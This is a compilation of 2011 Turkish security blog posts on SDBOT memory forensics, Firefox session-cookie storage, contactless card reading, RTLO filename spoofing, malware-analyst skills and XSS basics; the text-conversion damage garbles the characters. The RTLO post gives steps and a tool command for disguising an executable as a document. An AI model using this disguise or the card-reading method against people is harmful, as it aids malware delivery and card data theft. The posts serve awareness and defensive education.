56
1 Hack 4 Career - 2011 Bellek Analizi ile Zararlı Yazılım Analizi Source: https://www.mertsarica.com/adli-bilisimde-bellek-analizi/ By M.S on December 26th, 2011 Yine bir gün twitter.com/hack4career hesabından duyurulan hack edilmiş ve/veya zararlı yazılım barındıran web sitelerine göz atarken gün aşırı tespit edilen, çoğunlukla iki harften oluşan zararlı yazılımlar (aa.exe, bb.exe vb.) ve bunları barındıran IP adresleri dikkatimi çekti. IP adreslerinden güncel olanını Google arama motoru üzerinde arattığımda malc0de.com isimli bir web sitesi ile karşılaştım. Benim de ilk defa karşılaştığım bu sitenin kuruluş amacının, aynı zararlı yazılımları barındıran ve yayan farklı web sitelerini birbirleriyle ilişkilendiren bir veritabanı olduğunu öğrendim. Bu veritabanı, üzerinde ülke bazlı ve ASN bazlı (Autonomous System Name) arama yapılabiliyor olması sayesinde zararlı yazılım analistlerinden güvenli barındırma hizmeti arayanlara kadar birçok kişi tarafından kullanılabilir.

Hack 4 Career - 2011

  • Upload
    vudien

  • View
    221

  • Download
    1

Embed Size (px)

Citation preview

Page 1: Hack 4 Career - 2011

1

Hack 4 Career - 2011

Bellek Analizi ile Zararlı Yazılım AnaliziSource httpswwwmertsaricacomadli-bilisimde-bellek-analiziBy MS on December 26th 2011

Yine bir guumln twittercomhack4career hesabından duyurulan hack edilmiş veveya zararlı yazılım barındıran web sitelerine goumlz atarkenguumln aşırı tespit edilen ccediloğunlukla iki harften oluşan zararlı yazılımlar (aaexe bbexe vb) ve bunları barındıran IP adresleri dikkatimiccedilekti IP adreslerinden guumlncel olanını Google arama motoru uumlzerinde arattığımda malc0decom isimli bir web sitesi ile karşılaştımBenim de ilk defa karşılaştığım bu sitenin kuruluş amacının aynı zararlı yazılımları barındıran ve yayan farklı web sitelerini birbirleriyleilişkilendiren bir veritabanı olduğunu oumlğrendim

Bu veritabanı uumlzerinde uumllke bazlı ve ASN bazlı (Autonomous System Name) arama yapılabiliyor olması sayesinde zararlı yazılımanalistlerinden guumlvenli barındırma hizmeti arayanlara kadar birccedilok kişi tarafından kullanılabilir

2

gggexe uzantılı dosyayı barındıran ASNe youmlnelik arama yaptığımda benzer isimli zararlı yazılımların 2011 yılının Ocak ayından buyana aynı ASN uumlzerinde tespit ediliyor olması ve tespit edilen zararlı yazılımların sayısının 300uuml aşkın olması merakımı cezbetti vedeneme yanılma ile hhhexe adı altında tespit ettiğim zararlı yazılımı kısaca incelemeye karar verdim

Bu defa daha oumlnce gerccedilekleştirmiş olduğum alışılagelmiş analizlerin aksine zararlı yazılımın ccedilalıştığı sistemin belleğini diske kaydederekbellek (memory) analizi gerccedilekleştirmeye karar verdim

Adli bilişimde bellek analizi (memory forensic) denilince akla gelen ilk araccedil Volatilitydir Aslında araccedil dersek haksızlık etmişolabiliriz ccediluumlnkuuml işin aslı Volatility Python ile yazılmış birccedilok araccediltan oluşan bir ccedilatıdır (framework) Volatility ile diskekayıt edilmiş (dump) olan bellek dosyasını analiz ederek sistem uumlzerinde ccedilalışan programlardan ağ bağlantılarına yuumlkluumlolan DLLlerden kayıt defterinde (registry) yer alan anahtarlara goumlz atmaya kadar hedef sistem ile ilgili olan birccedilok işlemgerccedilekleştirebilirsiniz

Volatility 20 suumlruumlmuuml ile Windows XP SP2SP3 Windows 2003 SP0SP1SP2 Vista SP0SP1SP2 Windows 2008 SP1SP2 veWindows 7 SP0SP1 sistem goumlruumlntuumllerini (image) analiz edilebilmektedir

Volatility ile analiz edeceğimiz bellek dosyasını oluşturmak iccedilin oumlncelikle hedef sistem uumlzerinde MoonSols firması tarafındangeliştirilen DumpIt programının ccedilalıştırılması gerekmektedir

İlk iş olarak hhhexe dosyasını Windows 7 uumlzerinde ccedilalışan Windows XP SP3 sistemine kopyaladıktan sonra Windows 7 uumlzerindeWireshark aracını ccedilalıştırarak zararlı yazılım tarafından hedef sistem uumlzerinde uumlretilmesi muhtemel olan trafiği kayıt altına almasınısağladım hhhexe dosyası uumlzerinde yer alan uumlstveriye (metadata) baktığımda Logitech firması tarafından geliştirilmiş bir araccedilmış gibikendini tanımladığını goumlrduumlm Ardından hhhexe isimli zararlı yazılımı hedef sistem uumlzerinde ccedilalıştırdıktan sonra daha oumlnce hedefsisteme kopyalamış olduğumu DumpIt aracını ccedilalıştırarak sistemin belleğini diske kayıt etmesini sağladım

3

4

Zararlı yazılımı ccedilalıştırır ccedilalıştırmaz Wireshark aracı uumlzerinde HTTP ve IRC trafiği oluştuğunu goumlrduumlm ve bir IRC istemci yazılımı iletespit edilen bu IRC sunucusuna bağlandım Sunucuya bağlandığımda kanalın boş olması botların ifşa olmasını engelleme adına oumlzelolarak geliştirilmişmodifiye edilmiş bir irc sunucusu olduğuna işaret ediyordu Botun IRC kanalına giriş yapar yapmaz internete ccedilıkışyaptığı ip adres bloğunun 445 bağlantı noktasını otomatik olarak taramaya (port scan) başlaması da goumlzuumlmden kaccedilmadı Wiresharkuumlzerindeki HTTP paketlerini incelediğimde ise botun NATlanmış IP adresini oumlğrenebilmek iccedilin bir kaccedil sayfaya bağlanmaya ccedilalıştığınıfarkettim

5

Zararlı yazılım ile ilgili daha fazla bilgi almak iccedilin Volatility ile bellek dosyasını incelemeye başladım

İlk olarak PSLIST komutu ile sistem uumlzerinde ccedilalışan işlemleri (process) listeledim ve ccedilalıştırılma zamanına goumlre zararlı yazılımın sistemuumlzerinde 2888 PIDsine sahip indekexe adı altında ccedilalıştığını goumlrduumlm

6

DLLLIST komutu ile zararlı yazılım tarafından yuumlklenen DLL dosyalarını listelediğimde ise urlmondll ve cryptdlldll dosyaları şuumlpheliduruyordu

7

CONNSCAN komutu ile sistem uumlzerindeki aktif ağ bağlantılarını listelediğimde ise 2888 PIDsi ile ccedilok sayıda bağlantı kurulduğunugoumlrduumlm

PROCEXEDUMP komutu ile indekexe yazılımına ait olan belleği diske kaydettikten sonra strings ve IDA PRO programları ileincelediğimde ise bu zararlı yazılımın SDBOTın bir varyantı olduğunu kolayca anladım

8

9

Son olarak zararlı yazılım uumlzerinde yer alan zaman damgasına baktığımda ise SDBOT varyantının hemen hemen herguumln guumlncellenipderlendiği sonucu ortaya ccedilıkıyordu

Goumlruumllduumlğuuml uumlzere bellek analizi ile zararlı yazılımlar dinamik analiz kadar olmasa da rahatlıkla analiz edilebilir ve yeterli bir eldeedilebilinir Oumlzellikle bu yazıda değinmediğim diğer Volatility komutlarına (malfind gdt apihooks idt vb) goumlz atacak olursanız bellekanalizi ile rootkit yazılımlarını dahi tespit etmeniz muumlmkuumln olabilir

Bir sonraki yazıda goumlruumlşmek dileğiyle yeni yılın herkese sağlık mutluluk ve bol kazanccedil getirmesini dilerim

Firefox Oturum Geri Yuumlkleme OumlzelliğiSource httpswwwmertsaricacomfirefox-oturum-geri-yukleme-ozelligi

10

By MS on December 12th 2011

Accuvant firmasının yaptığı araştırmaya goumlre Chrome internet tarayıcısının rakiplerinden daha guumlvenli olduğu ortaya ccedilıkmış Araştırmasonucunda ortaya ccedilıkan sıralamada Firefox internet tarayıcısının uumlccediluumlncuuml sırada yer alması kimilerini şaşırtsa da beni pek şaşırtmadı

Geccediltiğimiz guumlnlerde bir web uygulaması uumlzerinde penetrasyon testi gerccedilekleştirirken işlem (transaction) bazlı jeton (token)kullanılmaması durumunda oturum ccedilerezini (session cookie) ccedilalan art niyetli bir kişinin kurbanın oturumunu ccedilaldıktan (session hijack)sonra uygulama uumlzerinde hangi işlemleri rahatlıkla gerccedilekleştirebileceğini duumlşuumlnuumlyordum Daha sonra oturum ccedilerezinde HTTPOnlybayrağının kullanılıyor olması nedeniyle bu riskin gerccedilekleşme ihtimalini duumlşuumlnmeye başladım Ardından işletim sistemine bulaşanzararlı bir yazılımın oturum ccedilerezini ccedilalmak iccedilin izleyeceği yolları duumlşuumlnmeye başladım Oturum ccedilerezi hafızadan (RAM) ne kadarrahatlıkla ccedilalınabilirdi Meşhur bankacılık truva atları (zeus spyeye) gibi internet tarayıcıları ile ilişkili dosyalara kanca (hook) atarakmı ccedilalmak daha kolay olurdu diye duumlşuumlnuumlrken dosya sistemi uumlzerinde tutulan normal ccedilerezlerden farklı olan oturum ccedilerezlerinin dosyasistemi uumlzerinde tutuluyor olma ihtimaline nedense pek ihtimal vermiyordum ancak yine de goumlz atmaya karar verdim

Oumlncelikle sanal makine uumlzerine Chrome (150874121) Firefox (801) ve Internet Explorer (90) internet tarayıcılarının en sonsuumlruumlmlerine kurdum ve uumlccedil internet tarayıcısı ile oturum ccedilerezi ile birlikte guumlvenlik bayrağı (secure flag) ve HTTPOnly bayrağı kullanılanbir web sitesini ziyaret ettim Ardından web sitesi tarafından her bir internet tarayıcısına goumlnderilen oturum ccedilerezini not ederekinternet tarayıcıları tarafından kullanılan klasoumlrlerde bu ccedilerezleri arattığımda sadece Firefox internet tarayıcısının oturum ccedilerezini dosyasisteminde kayıt altına aldığını goumlrduumlm

11

Sessionstorejs dosyasında yer alan objeler JavaScript Object Notation (JSON) formatında saklandığı iccedilin kolay okunabilmesi adınajsbeautifierorg sitesinde iccedileriği duumlzenlettiğimde oturum ccedilerezi okunabilir hale geldi

12

Peki ne Chrome ne Internet Explorer internet tarayıcısı oturum ccedilerezini dosya sistemi uumlzerinde okunaklı olarak saklamazken Firefoxsaklıyordu ve saklamasının son kullanıcıya ne tuumlr bir etkisi olabilirdi

Web siteleri sizi her oturumda size oumlzel uumlretilen oturum ccedilerezleri uumlzerinden takip eder doğrular ve işleminizi gerccedilekleştirir Oumlrnekolarak bir internet bankacılığı uygulaması duumlşuumlnelim Uygulamaya giriş yaptıktan sonra uygulama size o oturuma oumlzel bir oturumccedilerezi goumlndererek sizin doğrulama adımlarından başarıyla geccediltiğinizi kabul eder ve gerccedilekleştireceğiniz her işlemde (işlem bazlı jetonkullanılmadığı durumlarda) oturum ccedilerezinizi kontrol ederek işleminizi gerccedilekleştirir

Peki ya bu oturum ccedilereziniz ccedilalınırsa ne olur Art niyetli kişi sizin adınıza gerccedilekleştirmeye yetkili olduğunuz tuumlm işlemleri (paratransferleri doumlviz alışsatış vs) gerccedilekleştirebilir İşte bu nedenle oturum ccedilerezlerinin dosya sistemine kayıt edilmesi ve zararlı yazılımlartarafından kolaylıkla ccedilalınabilir olması tercih edilmez

Peki Firefox internet tarayıcısı bunu neden yapıyor Beklenmeyen bir durumda (crash) yeni bir eklenti yuumlklendikten sonra veya otomatikguumlncelleştirme sonrasında internet tarayıcısının yeniden başlatılması gibi ihtiyaccedillar ortaya ccedilıktığı iccedilin oturumların kaldığı yerden devamedebilmesi (session restore) amacıyla oturum ccedilerezlerini Sessionstorejs dosyasında saklamaktadır

Her ne kadar sisteme bulaşmış zararlı bir yazılım guumlnuumln sonunda hangi internet tarayıcısı olursa olsun bellekten okuma kancaatma ve diğer youmlntemler ile oturum ccedilerezlerini ccedilalabilse de kullandığınız internet tarayıcınızın art niyetli kişilerin işlerini bu kadarkolaylaştırmıyor olması gerekmektedir

Guumlvenliğiniz iccedilin oturum geri yuumlkleme (session restore) oumlzelliğini devre dışı bırakmanızı oumlneririm Bunun iccedilin aşağıdaki iki değeri 0olarak değiştirmeniz yeterli olacaktır

13

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Temassız TehlikeSource httpswwwmertsaricacomtemassiz-tehlikeBy MS on November 25th 2011

Son guumlnlerde sahip olduğum kredi kartlarına baktığımda hemen hemen hepsinin temassız kredi kartı (Mastercard ise Paypass yazısı Visaise PayWave amblemi) olduğunu farkettim 2008 yılında temassız kredi kartlarının sayısı bir elin parmaklarını geccedilmezken guumlnuumlmuumlzdeartık ccediloğu banka muumlşterilerinin kredi kartlarını temassız kredi kartları ile yeniler oldu Oumlzellikle NFC (Near Field Communication)teknolojisinin cep telefonları ve akıllı telefonlarda yer alması ve yakın zamanda temassız alışverişe imkan sağlayacak olmaları nedeniyle

14

kimi haber sitelerinde yer alan haberlere goumlre yakın zamanda temaslı ve temassız kredi kartları tarih olarak yerlerini bu cihazlara bırakıyorolacaklar

Her ne kadar bu ve benzer haberlerin oumlnuumlmuumlzdeki 5 yıl iccedilerisinde gerccedilekleşme olasılığı bana goumlre duumlşuumlk olsa da bir guumlvenlik uzmanıolarak cuumlzdanımda RFID teknolojisini kullanan temassız kredi kartı taşımak yerine NFC teknolojisini kullanmayı tercih ederim Bununen buumlyuumlk nedeni cuumlzdanınızda bulunan temassız kredi kartı haberiniz olmadan herhangi bir RFID okuyucu ile okunabilirken NFCteknolojisi kullanan bir cihazda bu olasılığın oldukccedila duumlşuumlk olmasıdır nedeni ise bunun iccedilin oumlncelikle kredi kartı yerine kullanacağınızmobil uygulamayı ccedilalıştırmış ve NFC vericisini devreye sokmuş olmanız gerekmektedir

Peki benim gibi cuumlzdanında temassız kredi kartı taşıyanlar iccedilin durum ne kadar vahim veya gerccedilekten vahim mi Gelin bu soruyabirlikte yanıt arayalım

Eğer yıl 2008 olsaydı ve cuumlzdanınızda temassız kredi kartı taşıyor olsaydınız meraklı bir kişi RFIDIOt adındaki yazılım ve desteklediğiRFID okuyucu ile temassız kredi kartınızın iccedilinde yer alan etiketi okuyarak adınızı soyadınızı kredi kartı numaranızı ve kredi kartınızınson kullanma tarihini kolaylıkla oumlğrenebilirdi Nasıl mı İşte boumlyle

Guumlnuumlmuumlze gelecek olursak aynı durumun halen geccedilerli olup olmadığının yanıtını geccediltiğimiz guumlnlerde aramaya koyuldum ve testebaşlayabilmek iccedilin ilk olarak ihtiyaccedil duyacağım malzemeleri toplamaya başladım Temassız kredi kartı olarak geccediltiğimiz aylarda elimeulaşan Mastercardın temassız kredi kartını RFID okuyucu olarak OmniKey CardMan 5321 cihazını okuyucu yazılımı olarak iseRFIDIOt v10b yazılımını işletim sistemi olarak uumlzerinde Python v271 pyreadline ve pyscard moduumlllerinin kurulu olduğu Windows7 işletim sistemini kullandım

Teste başladığım zaman RFIDIOt yazılımının temassız kredi kartında yer alan etiketi okuduktan sonra Unrecognized TAG(tanımlanamayan etiket) hatasını doumlnduumlğuumlnuuml goumlrduumlm Hata ile birlikte doumlnen paketleri incelediğimde bu paketler iccedilerisinde kredikartı numaramın ve son kullanma tarihinin HEX değerlerinin yer aldığını goumlrduumlm Yaklaşık 15 sene oumlnce guumlncellenen RFIDIOtyazılımında yer alan tanımlı APDU komutlarının ve ccediloumlzuumlmleme (parse) fonksiyonlarının eski kaldığını duumlşuumlnerek alternatif yazılımlararamaya koyuldum ve Brad Antoniewiczin blogunda yer alan ChasePayPassBlink yazılımı ile karşılaştım Ancak bu yazılımın Chasebankamatikkredi kartına youmlnelik geliştirildiğini oumlğrendikten sonra elimde bulunan Mastercardın Paypass kredi kartı iccedilin bu yazılımuumlzerinde değişiklikler yapmam gerekeceğini anladım ve kısa bir araştırma ve ccedilalışmanın sonucunda ortaya Paypass Kredi Kartı Okuyucuyazılımı ccedilıkmış oldu Yazılımı ccedilalıştırır ccedilalıştırmaz temassız kredi kartından kredi kartı numarasını ve son kullanma tarihini başarıylaokuyabildiğini goumlrduumlkten sonra testi tamamladım

2008 yılından farklı olarak temassız kredi kartında yer alan etikette artık muumlşteri adı ve soyadının yer almamasını sevinccedille karşılamışolmama rağmen kredi kartı numarasının ve son kullanma tarihinin halen okunabiliyor olması her ne kadar direkt olarak dolandırıcılartarafından alehyte kullanılamayacak olsa da sosyal muumlhendislik youmlntemleri ile diğer bilgiler ile birleştirilerek kullanılma ihtimalikonusunda duumlşuumlnduumlrtmeye yetti

Peki ya sonuccedil Sonuccedil itibariyle cuumlzdanınızda veya cebinizde bulunan kredi kartı numaranız ve kredi kartınızın son kullanma tarihi birşekilde (bu 2008 yılındaki videoda olduğu gibi koca bir RFID okuyucuyu cebinize yakınlaştırarak olabilir RFID kapı anteni kullanılarakolabilir veya StrongLink gibi ufak bir okuyucu kullanarak olabilir) meraklı kişi veya kişiler tarafından okunabilir Bu ihtimal duumlşuumlkdahi olsa sizin iccedilin oumlnemli bir husus ise ccediloumlzuumlm oumlnerisi olarak 20$ gibi cuumlzi bir uumlcret oumldeyerek internetten sipariş edebileceğiniz RFIDkorumalı bir cuumlzdan kullanmanızı oumlnerebilirim

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Her Goumlrduumlğuumlne İnanmaSource httpswwwmertsaricacomher-gordugune-inanmaBy MS on November 1st 2011

RTLO namı diğer RIGHT-TO-LEFT OVERRIDE Windows XP işletim sistemi kullanırken pek ccediloğumuzun dikkate almadığı ancakWindows Vista ve Windows 7 işletim sistemi kullanırken ccedilok dikkatli olmamızı gerektiren bir Evrensel kod (unicode) karakteridir(u202E) RTLO kısaca karakterlerin soldan sağa değil sağdan sola olarak işlem goumlrmesini sağlar ve bu sayede sağdan sola yazılan diller(Arapccedila İbranice Suumlryanice vs) desteklenebilmektedir

Windows XP işletim sistemi varsayılan (default) olarak az oumlnce bahsi geccedilen dilleri desteklememekte ek bir paket yuumlklenerek (Installfiles for complex script and right-to-left languages) destekleyebilmekteydi Ancak Windows Vista ve Windows 7 işletim sistemlerininhayatımıza girmesi ile bu durum değişti ve varsayılan olarak bu diller desteklenir hale geldi Peki bu desteğin bizimle ne ilgisi var

Yıllarca yakınımızdakiler tarafından yapılan şu şekilde uyarılara kulak kabarttık durduk Bir dosyayı ccedilalıştırmadan oumlnce uzantısınamutlaka dikkat et Uzantısı exe ise sakın ccedilalıştırma viruumls olabilir ve bu sayede yıllar iccedilinde hepimiz ister istemez bir dosyayı

15

ccedilalıştırmadan oumlnce uzantısına dikkat eder olduk Ccediloğu kimse farkında olmasa da bu kontrol sayesinde art niyetli kişiler zararlı yazılımlarısistemlere bulaştırabilmek iccedilin daha farklı sosyal muumlhendislik youmlntemlerine başvurmak zorunda kaldılar Bu youmlntemlerden biri de RTLOevrensel kod karakterli dosya adlarına sahip zararlı yazılımlar oluşturmak oldu Peki bu dosya adlarını nasıl oluşturuyorlar da kullanıcılarıkolaylıkla kandırabiliyorlar

Oumlncelikle RTLO evrensel kod karakteri iccedileren dosya adını Windows 7 işletim sistemi uumlzerinde oluşturabilmek iccedilin kayıt defterinde(registry) bir kaccedil değişiklik yapmak ve daha sonra sistemi yeniden başlatmak gerekiyor

Bunun iccedilin izlenmesi gereken adımlar sırasıyla

bull Regedit komutu ccedilalıştırılır (Start -gt Arama kutucuğu -gt regedit)

bull HKEY_CURRENT_USERControl PanelInput Method altında EnableHexNumpad anahtarı oluşturulur ve anahtara 1 değeriatanır

bull Sistem yeniden başlatılır

Ardından exe olan program uzantısının istenilen başka bir uzantıymış gibi goumlruumlnmesi iccedilin RTLO evrensel kod karakterini dosya adındakullanıyorlar Daha net olması adına ufak bir oumlrnek uumlzerinden ilerleyelim

bull Windowssystem32 klasoumlruuml altında yer alan calcexe programını dilediğiniz bir klasoumlre kopyalayın

bull Programın uzantısının doc olarak goumlruumlnmesini sağlayacağımız iccedilin programın simgesini (icon) Microsoft Word simgesi olarakdeğiştirin (Resource Hacker programı işinizi goumlrecektir)

bull Daha sonra programın adını (rename) codexe olarak değiştirin

bull Ardından programın adını tekrar değiştirmek iccedilin programın uumlzerine farenin sağ tuşu ile basıp menuumlden yeniden adlandır (rename)oumlğesini seccedilin

bull İmleci c harfinin başına (en sol) getirin ve ardından klavyeden NUMLOCK accedilık iken ALT ve FN tuşlarına basılı tutarak +202Etuşlarına basın

Goumlrduumlğuumlnuumlz uumlzere programın uzantısı artık doc olarak goumlzuumlkuumlyor Komut satırından programın bulunduğu klasoumlrde DIR komutunuccedilalıştıracak olursanız bu yanılgının goumlruumlntuumlden ibaret olduğunu hemen anlayabilirsiniz

16

Python ile yukarıda bahsetmiş olduğum adımları (simge değiştirme hariccedil) otomatize eden RTLOpy isimli programa buradanulaşabilirsiniz

Programın kullanımı python rtlopy [extension] [source filename] [new filename]Oumlrnek kullanım python rtlopy doc calcexe Confidential_document_no_

Sonuccedil olarak Windows Vista veya Windows 7 kullanıcısıysanız ve eskiden kalma uzantı kontroluuml yaparak programları goumlzuuml kapalıccedilalıştırma alışkanlığınız varsa yakın zamanda sıkıntı yaşama ihtimaline karşı programları ccedilalıştırmadan oumlnce iccedilinde bulunduğu klasoumlrdeyer alan TYPE (Application ise dikkat) kolonuna veya HEX Editoumlr ile başlık bilgisine (ilk 2 bayt MZ ise dikkat) dikkat etmeniz faydalıolacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Zararlı Yazılım Analisti OlmakhellipSource httpswwwmertsaricacomzararli-yazilim-analisti-olmakBy MS on October 5th 2011

Son yıllarda Windows işletim sistemini hedef alan Zeus SpyEye TDL gibi hatrı sayılır zararlı yazılımlara manşetlerde sıkccedila rastlıyordukDaha sonra o ccedilok guumlvenli Mac OS X işletim sisteminin kullanım oranının artış goumlstermesi ile (bunun en buumlyuumlk nedenlerinden biri de MacOS Xe zararlı yazılım bulaşmaz yanılgısı olsa gerek) bu sisteme youmlnelik geliştirilen zararlı yazılımlar da manşetlerde yerini birer bireralmaya başladı Guumln geldi tweet atmaktan internette soumlrf yapmaya e-posta okumaktan bankacılık işlemleri gerccedilekleştirmeye kadar birccedilok alanda ihtiyaccedillarımızı karşılayabilen modern işletim sistemleri ile guumlccedillendirilmiş olan akıllı mobil cihazlar iccedilin geliştirilen zararlıyazılımlar manşetleri suumlslemeye başladı Peki bilgi hırsızlığı iccedilin geliştirilen zararlı yazılımlar neden bu kadar revaccedilta

17

Uumlnluuml bir banka soyguncusu olan Willie Suttone Neden banka soyuyorsunuz diye bir soru youmlnelten muhabirin aldığı Ccediluumlnkuuml paraorada yanıtını guumlnuumlmuumlze uyarlar ve Neden zararlı yazılım geliştiriyorsunuz diye bir soru soracak olsaydık alacağımız yanıt şuumlphesizCcediluumlnkuuml finansal getirisi ccedilok yuumlksek olurdu ve ilk sorduğumuz sorunun da yanıtını almış olurduk

Oumlyle bir duumlnyada yaşıyoruz ki hiccedil bir zaman kansere aidse ve diğer oumlluumlmcuumll hastalıklara ccedilare bulunmayacağına sadece bu hastalıklarınilerlemesini engelleyen kontrol altında tutan pahalı ilaccedilların piyasada olacağına inanıyorum BilgiBilişim guumlvenliği sektoumlruumlnuuml de aynışekilde duumlşuumlnuumlyorum Hiccedil bir zaman ccedilok guumlvenli bir işletim sistemi tasarlanmayacak veya bir antiviruumls yazılımı tuumlm zararlı yazılımlarıtespit ediyor veya sisteme bulaşmasını engelliyor olmayacak Durum boumlyle olunca da nasıl hastalıkların bulaşmasını engellemek tedavietmekten daha kolay ise aynı şekilde zararlı yazılımların da sistemlere bulaşmasını engellemek sistemlerden kaldırmaktan daha kolayolmaya devam edecek Zararlı yazılımlar ha bulaştı ha bulaşacak derken kurumlar daha fazla zararlı yazılım analistine veya bu beceriyesahip ccedilalışanları istihdam etmeye başlayacak ve bu sayede bu alanda uzmanlaşmak isteyenler bu işten keyif alanlar iccedilin zararlı yazılımanalizi hobi olmaktan ccedilıkarak mesleklerinin bir parccedilası haline doumlnuumlşecektir Oumlzellikle APTlerin dev kurumları hedef aldığı son aylardakendi personeli ile zararlı yazılım analizi yapabilen bir kurum olmanın getirisi (3 partilere guumlven kaygısı kapalı kapılar ardında ccediloumlzuumlmuumlretme ihtiyacı) paha biccedililmez olsa gerek

Peki zararlı yazılım analisti olmak iccedilin ne tuumlr bilgibecerilere sahip olmanız gerekiyor

Programlama becerisi Bilişim guumlvenliği uzmanı olupta programlama dili bilmiyorum demek kulağa ne kadar garip geliyorsa (gelmiyorsada ben ccedilok yadırgıyorum her zaman araccedillar işinizi goumlrmeyebilir) zararlı yazılım analistiyim ancak Assemblyden Javadan CdenCden anlamıyorum demek kulağa bir o kadar garip gelebilir Oumlrneğin Java ile yazılmış bir zararlı yazılımı decompile ettikten sonrakodu analiz etmeniz gerekecek bu durumda ne yapacaksınız Veya zararlı bir yazılımı assembly seviyesinde ccedilalışan bir debugger ile(Ollydbg veya Immnunity Debugger) analiz ediyorsunuz Assembly bilmeden programın akışına nasıl muumldahale edecek veya şifrelemeanahtarlarını nasıl ele geccedilireceksiniz Gereksinimler boumlyle olunca bir zararlı yazılım analistinin C ve Assembly programlama dillerineyabancı olmaması buna ilaveten diğer programlama dilleri ile yazılmış (C++ Java Net) programların kaynak kodlarına az ccedilok goumlzgezdirmiş olması gerekmektedir Bunlara ilaveten Python veya Ruby gibi programlama dillerinden faydalanarak hızlı bir şekilde kendiprogramınızı yazmanız gerekebilir Oumlrneğin hafızadan diske kayıt ettiğiniz (dump) zararlı bir yazılımdan otomatik olarak şifrelemeanahtarlarını toplayan ve şifrelemeyi ccediloumlzen bir program yazmak istiyorsunuz Şayet Python biliyorsanız IDAPython ile ufak betikler(script) yazmanız işinizi oldukccedila hızlandıracaktır Anlayacağınız uumlzere zararlı yazılım analisti olma konusunda ısrarcı iseniz birden fazlaprogramlama dili bilmeniz (uzman seviyesinde olmasa da) şart

Sistem ağ ve uygulama youmlneticisi becerisi En basitinden elinizde analiz etmeniz gereken bir zararlı yazılım var ve bunu kendisisteminizde analiz etmemeniz gerektiğini az ccedilok tahmin edebiliyorsunuzdur Bu durumda yapmanız gereken izole bir ortamda kontrolluumlbir şekilde bu yazılımı ccedilalıştırmaktır Bunun iccedilin sanal ortamlardan (VMWare veya Virtual Box iyi bir seccedilim olacaktır) oluşanzararlı yazılım analiz laboratuvarı kurmanız gerektiği iccedilin işletim sistemi kurulumundan konfiguumlrasyonuna sanal ağ yapılandırmalarıoluşturmaya kadar bir ccedilok konuda bilgi sahibi olmanız gerekmektedir Oumlrneğin Android işletim sistemini hedef alan zararlı bir yazılımıanaliz etmeniz gerekiyor Bu durumda mutlaka Android OS yuumlkluuml bir cihaza mı ihtiyacınız var Tabii ki hayır sanal sistem uumlzerinekuracağınız ve yapılandıracağınız bir emuumllatoumlr işinizi goumlrecektir Veya ağ uumlzerinden yayılmaya ccedilalışan zararlı bir yazılımın oluşturduğutrafiği izlemeniz ve analiz etmeniz gerekecek bu durumda ağ bilgisine ihtiyaccedil duyacaksınız misal hangi port uumlzerinden hangi protokoluumlkullanıyor şifreli mi haberleşiyor Veya analiz ettiğiniz zararlı yazılım internette bulunan bir web sunucusu uumlzerindeki 0 guumln zafiyetiniistismar etmeye ccedilalışıyor ancak analizi tamamlamak iccedilin bunu gerccedilekleştirmesine izin veremezsiniz bu nedenle sanal sisteminizinDNS kayıtlarını aradığı alan adını sanal sisteminize youmlnlendirecek şekilde yapılandırarak ve kuracağınız aynı suumlruumlm web sunucusunayoumlnlendirerek istismar etmesini sağlamanız ve analiz etmeniz gerekecektir Kısacası yeri gelecek sistem ağ ve uygulama youmlneticisininsahip olduğu huumlnerleri sergileyeceğiniz bir ortam oluşturarak zararlı yazılımın başarıyla ccedilalışmasını sağlayacak alt yapıyı oluşturmanızgerekecektir

Her zamanki gibi zararlı yazılım analizi ile ilgili kitaplar okumak (misal Malware Analysts Cookbook ve bu listede yer alan kitaplar)blogları ve haber kaynaklarını takip etmek (misal MNIN Security Blog) eğitimlere katılmak (misal SANSın Reverse-EngineeringMalware Malware Analysis Tools and Techniques eğitimi) ve tabii ki bol bol pratik yapmak (bunun iccedilin uumlzerinde zararlı yazılımtespit edilen sitelerin duyurulduğu twittercomhack4career twitter sayfasına goumlz atmak ve zararlı yazılımları indirerek incelemek iyi birbaşlangıccedil olabilir) zaman iccedilinde sizi başarıya ulaştıracaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

XSS = Basit Bir KutucukSource httpswwwmertsaricacomxss-ve-beefBy MS on August 19th 2011

Bu zamana dek cross-site scripting ile ilgili ccedilok sayıda makale hikaye okumuş olabilirsiniz ancak cross-site scripting zafiyetinin halenweb uygulamalarında en ccedilok rastlanan guumlvenlik zafiyetlerinin başında geliyor olması nedeniyle farkındalığı arttırma adına ben debirşeyler karalamak istedim

Cross-site scripting nam-ı diğer XSS ve Tuumlrkccedile meali ile siteler arası betik ccedilalıştırma zafiyeti ile ilgili son kullanıcı olarak buguumlne dekccedilok fazla haber duydunuz yazılımcı veya youmlnetici olarak ccedilok sayıda XSS yazan bir kutucuk goumlrduumlnuumlz ve bu nedenle XSS zafiyetininuygulama uumlzerinde zararsız kuumlccediluumlk bir kutucuk ccedilıkarmaktan ibaret olduğunu duumlşuumlnebilirsiniz ancak gerccedilekler bir kutucuk ile sınırlı değil

Siteler arası betik ccedilalıştırma zafiyeti (XSS) kabaca bir web uygulamasının girdi olarak kabul ettiği kodu (ccediloğunlukla javascript)filtrelemeden kullanıcıya sunması sonucunda ortaya ccedilıkmaktadır

18

Siteler arası betik ccedilalıştırma zafiyeti uumlccedile ayrılmaktadır

bull Kalıcı (persistentstored) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanına bir defa yazıldıktansonra daha sonra iccedileriğin internet tarayıcısı tarafından her ccedilağrılmasında (oumlrnek olarak foruma yazılmış bir mesajı veya bir haberinaltına yazılan bir yorumu duumlşuumlnuumln) tekrar ve tekrar kullanıcıya sunulur

bull Kalıcı olmayan (non-persistentreflected) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanınayazılmadığı iccedilin sadece bir defa internet tarayıcısı tarafından (E-posta veya sohbet programı uumlzerinden size goumlnderilmiş bir bağlantıadresine (URL) tıkladığınızı duumlşuumlnuumln) ccedilağrılması ile kullanıcıya sunulur

